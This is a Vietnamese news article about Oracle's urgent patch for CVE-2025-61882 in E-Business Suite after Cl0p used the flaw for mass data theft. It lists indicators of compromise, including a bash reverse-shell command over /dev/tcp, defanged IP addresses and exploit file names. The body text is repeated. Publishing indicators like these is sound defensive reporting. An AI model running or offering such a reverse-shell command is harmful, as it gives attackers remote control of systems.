-
09/04/2020
-
115
-
1.152 bài viết
Gấp: Oracle vá lỗ hổng nghiêm trọng bị tin tặc khai thác đánh cắp dữ liệu hàng loạt
Oracle vừa phát hành bản vá khẩn cấp cho lỗ hổng nghiêm trọng CVE-2025-61882, điểm CVSS 9,8 trong E-Business Suite, sau khi nhóm tin tặc Cl0p lợi dụng lỗ hổng này để tấn công đánh cắp dữ liệu quy mô lớn.
Theo Oracle, lỗi này tồn tại ở thành phần Concurrent Processing cho phép tin tặc chiếm quyền kiểm soát hệ thống từ xa mà không cần tài khoản hay mật khẩu. Khi khai thác thành công, kẻ tấn công có thể thực thi mã độc từ xa (RCE) và chiếm quyền điều khiển toàn bộ hệ thống.
Trong quá trình điều tra, Oracle còn phát hiện nhiều nỗ lực khai thác bổ sung, nghi ngờ có sự tham gia của nhóm Scattered LAPSUS$ Hunters với các chỉ dấu tấn công (IoC) liên quan như địa chỉ IP độc hại và công cụ khai thác đã bị rò rỉ công khai.
Các tổ chức nên kiểm tra xem hệ thống của mình có ghi nhận các dấu hiệu sau hay không:
Các chuyên gia cũng đã dự báo chiến dịch hiện tại có quy mô rất lớn với hàng trăm email tấn công được gửi từ các tài khoản bị xâm nhập. Tin tặc đã lợi dụng nhiều lỗ hổng khác nhau, bao gồm cả lỗi đã được vá từ tháng 7/2025 và lỗi vừa được khắc phục cuối tuần qua.
Ngay cả khi đã cài đặt bản vá, các tổ chức vẫn nên khẩn trương kiểm tra toàn bộ hệ thống để xác định liệu có dấu hiệu bị xâm nhập trước đó hay không. Đồng thời, hãy cập nhật bản vá mới nhất của Oracle E-Business Suite ngay lập tức, giám sát chặt chẽ hoạt động đăng nhập và rà soát hệ thống định kỳ nhằm kịp thời phát hiện và ngăn chặn các nguy cơ tấn công còn tiềm ẩn.
Theo Oracle, lỗi này tồn tại ở thành phần Concurrent Processing cho phép tin tặc chiếm quyền kiểm soát hệ thống từ xa mà không cần tài khoản hay mật khẩu. Khi khai thác thành công, kẻ tấn công có thể thực thi mã độc từ xa (RCE) và chiếm quyền điều khiển toàn bộ hệ thống.
Trong quá trình điều tra, Oracle còn phát hiện nhiều nỗ lực khai thác bổ sung, nghi ngờ có sự tham gia của nhóm Scattered LAPSUS$ Hunters với các chỉ dấu tấn công (IoC) liên quan như địa chỉ IP độc hại và công cụ khai thác đã bị rò rỉ công khai.
Các tổ chức nên kiểm tra xem hệ thống của mình có ghi nhận các dấu hiệu sau hay không:
- 200.107.207[.]26 và 185.181.60[.]11 - ghi nhận hoạt động GET/POST bất thường
- Câu lệnh tạo kết nối ngược: sh -c /bin/bash -i >& /dev/tcp// 0>&1
- Một số tệp khai thác bị phát hiện:
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- exp.py và server.py trong cùng thư mục khai thác
Các chuyên gia cũng đã dự báo chiến dịch hiện tại có quy mô rất lớn với hàng trăm email tấn công được gửi từ các tài khoản bị xâm nhập. Tin tặc đã lợi dụng nhiều lỗ hổng khác nhau, bao gồm cả lỗi đã được vá từ tháng 7/2025 và lỗi vừa được khắc phục cuối tuần qua.
Ngay cả khi đã cài đặt bản vá, các tổ chức vẫn nên khẩn trương kiểm tra toàn bộ hệ thống để xác định liệu có dấu hiệu bị xâm nhập trước đó hay không. Đồng thời, hãy cập nhật bản vá mới nhất của Oracle E-Business Suite ngay lập tức, giám sát chặt chẽ hoạt động đăng nhập và rà soát hệ thống định kỳ nhằm kịp thời phát hiện và ngăn chặn các nguy cơ tấn công còn tiềm ẩn.
Theo The Hacker News